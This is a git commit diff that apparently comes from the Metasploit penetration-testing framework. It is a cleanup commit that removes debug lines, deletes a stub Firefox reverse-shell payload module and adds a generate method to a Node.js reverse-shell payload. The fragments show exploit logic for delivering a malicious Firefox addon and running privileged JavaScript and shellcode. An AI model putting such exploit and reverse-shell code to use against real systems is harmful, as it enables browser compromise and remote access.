Remove a number of stray edits and bs.

2014-06-06 16:24:45 -05:00 · 2014-06-06 16:24:45 -05:00 · d990fb4999
parent 4a9f50bb60
commit d990fb4999
6 changed files with 8 additions and 41 deletions
--- a/data/webcam/offerer.html
+++ b/data/webcam/offerer.html
@ -88,7 +88,6 @@
 		=WEBRTCAPIJS=

 		var channel = '=CHANNEL=';
-		var myChannel = channel;
 		var websocket = new WebSocket('ws://=SERVER=');

 		websocket.onopen = function() {
--- a/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb
+++ b/lib/msf/core/exploit/remote/firefox_privilege_escalation.rb
@ -18,7 +18,7 @@ module Exploit::Remote::FirefoxPrivilegeEscalation
    print_status "Running the privileged javascript..."
    token = "[[#{Rex::Text.rand_text_alpha(8)}]]"
    session.shell_write("#{token}[JAVASCRIPT]#{js}[/JAVASCRIPT]#{token}")
-    session.shell_read_until_token("[!JAVASCRIPT]", 0, 30)
+    session.shell_read_until_token("[!JAVASCRIPT]", 0, timeout)
  end

  # Puts the shellcode into memory, adds X flag, and calls it
--- a/lib/msf/core/payload/firefox.rb
+++ b/lib/msf/core/payload/firefox.rb
@ -34,7 +34,6 @@ module Msf::Payload::Firefox
        return function(request, context, stream, offset, count) {
          buffer += NetUtil.readInputStreamToString(stream, count);
          if (buffer.match(/^(\\[\\[\\w{8}\\]\\])/)) {
-
            if (m = buffer.match(/^(\\[\\[\\w{8}\\]\\])([\\s\\S]*)\\1/)) {
              cb(m[2]);
              buffer = '';
--- a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb
+++ b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb
@ -67,11 +67,9 @@ class Metasploit3 < Msf::Exploit::Remote
      print_status("Sending the malicious addon")
      send_response(cli, generate_addon_xpi(cli).pack, { 'Content-Type' => 'application/x-xpinstall' })
    else
-      File.write('/tmp/ff.html', generate_html(target_info))
      print_status("Sending HTML")
      send_response_html(cli, generate_html(target_info))
    end
-    
  end

  def generate_html(target_info)
--- a/modules/payloads/singles/firefox/shell_reverse_tcp_ssl.rb
+++ b/modules/payloads/singles/firefox/shell_reverse_tcp_ssl.rb
@ -1,36 +0,0 @@
-##
-# This module requires Metasploit: http//metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-require 'msf/core'
-require 'msf/core/handler/reverse_tcp_ssl'
-require 'msf/base/sessions/command_shell'
-require 'msf/base/sessions/command_shell_options'
-
-module Metasploit3
-
-  include Msf::Payload::Single
-  include Msf::Payload::Firefox
-  include Msf::Sessions::CommandShellOptions
-
-  def initialize(info={})
-    super(merge_info(info,
-      'Name'          => 'Command Shell, Reverse TCP SSL (via Firefox XPCOM script)',
-      'Description'   => %q{Creates an interactive shell via Javascript with access to Firefox's XPCOM API},
-      'Author'        => ['joev'],
-      'License'       => BSD_LICENSE,
-      'Platform'      => 'firefox',
-      'Arch'          => ARCH_FIREFOX,
-      'Handler'       => Msf::Handler::ReverseTcpSsl,
-      'Session'       => Msf::Sessions::CommandShell,
-      'PayloadType'   => 'firefox'
-    ))
-  end
-
-  def generate
-    # reverse_connect(:ssl => true)
-    ""
-  end
-
-end
--- a/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb
+++ b/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb
@ -30,6 +30,13 @@ module Metasploit3
    ))
  end

+  #
+  # Constructs the payload
+  #
+  def generate
+    super + command_string
+  end
+
  #
  # Returns the JS string to use for execution
  #